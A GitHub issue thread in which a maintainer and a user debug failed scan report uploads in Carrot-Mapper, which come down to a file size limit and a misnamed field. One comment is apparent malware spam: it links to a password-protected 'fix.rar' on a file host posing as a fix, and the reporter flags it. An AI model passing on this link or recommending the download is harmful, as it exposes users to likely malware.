### ISSUE TITLE
New Scan Report upload not showing any errors upon failed validation

### ISSUE THREAD

**Issue by erummas** [Health-Informatics-UoN/Carrot-Mapper#857]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

I am uploading a scan report which is failing to upload, in the previous UI there were some helpful errors to debug the issue but don't see any in the new UI. Unsure what the cause could be as I have prepared it like any other scan report.

### Environment

```markdown
- OS:
- Other environment details:
```

### Are you willing to contribute to resolve this issue?

None

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by erummas** [comment]
Spam alert ^

**Comment by AndyRae** [comment]
That's odd - we'll take a look, thanks Erum!

**Comment by AndyRae** [comment]
I've had a closer look at this, and we are still displaying errors as expected with my testing, at the top of the form.

 _(I would note, this is a bad user experience currently. I would expect if the errors appear at the top of the form, for the page to scroll up when the form submission fails. Or for the errors to be at the bottom and visible in the viewport when submitting.)_ 

<img width="913" alt="Screenshot 2024-08-27 at 09 40 26" src="https://github.com/user-attachments/assets/e02abf20-5f79-4aa9-8a04-16fe31a7916b">

We look to still be supporting the range of errors / scan report validation that we did previously, and I'm also not seeing any uncaught errors in our logs, so nothing seems to be completely breaking. It is fully possible that we have failed validation on some unrealised structure.

@erummas firstly could you check that if any errors were shown at the top of the form?
If it is feasible - having a copy of the Scan Report would be the only way we could really investigate further. The "data" could be completely removed, as in, as long as we retain the field/table names / structure.

**Comment by AndyRae** [comment]
>  and I'm also not seeing any uncaught errors in our logs, so nothing seems to be completely breaking. It is fully possible that we have failed validation on some unrealised structure.

I actually do see something in our logs, about max upload size being breached. It might not be this form, but my instinct is that it is.
@erummas - how large is the scan report?

**Comment by erummas** [comment]
@AndyRae It’s a very small SR in terms of field values, as compared to the ones I have uploaded before. It is wide however. So more number of columns, about 498 I think (May be that’s the cause?). Although the SR doesn’t require Data Dictionary, I did upload empty DD to see if that’s works. I will email you the SR just now.

**Comment by AndyRae** [comment]
Yep this is just a large files limit - it requires a small code change, so we should have a fix deployed this evening after some testing. 

We're moving up to support 10mb Scan Reports, for now...

**Comment by AndyRae** [comment]
Fixed in #853 - uploading larger files is now possible. It takes a second or two to go through validation, and the form pauses.. so we'll look at improving that experience.

**Comment by erummas** [comment]
@AndyRae could you please look at SR **#683**, it's failing to upload. The size is smaller than previously uploaded GP and SMR01 SR but they were uploaded with the older UI. Unsure if it's the size as the upload process doesn't show any errors.

**Comment by AndyRae** [comment]
Yep will look now

**Comment by AndyRae** [comment]
@erummas Here is what I have found so far:

1. The upload failure is not the size.
2. The upload mostly succeeds, tables, fields, and some values are added.
3. The `ReadCode` field fails to upload it's values I think, in `gpread_data.csv` the field is actually named `ReadNew`. Making this change enables it to be upload successfully. 

I'm fairly there should be validation for this exact scenario, so will investigate why that is not triggering.

**Comment by erummas** [comment]
Hi @AndyRae, I think the error/warnings are still not enabled. I am uploading a scan report and it doesn't even pass to the next page with scan report status. Once I click upload it does show the status popups showing that it is being validated but nothing after that. Hard to debug as doesn't show any error, could be something minor but with no direction where to look at unsure what could be the reason. I have checked it and it seems fine. I will email you the scan report.

**Comment by erummas** [comment]
Hi @AndyRae I figured the issue, basically when you clean the scan report and remove certain column values the record cells don't get deleted and thus the file size stays considerably big even if there are no values in cells. That file was 15Mb. I have now reduced it to just under 3Mb, and managed to get submit it but the upload fails. Again no error showing what could be the issue, I will email the updated scan report.
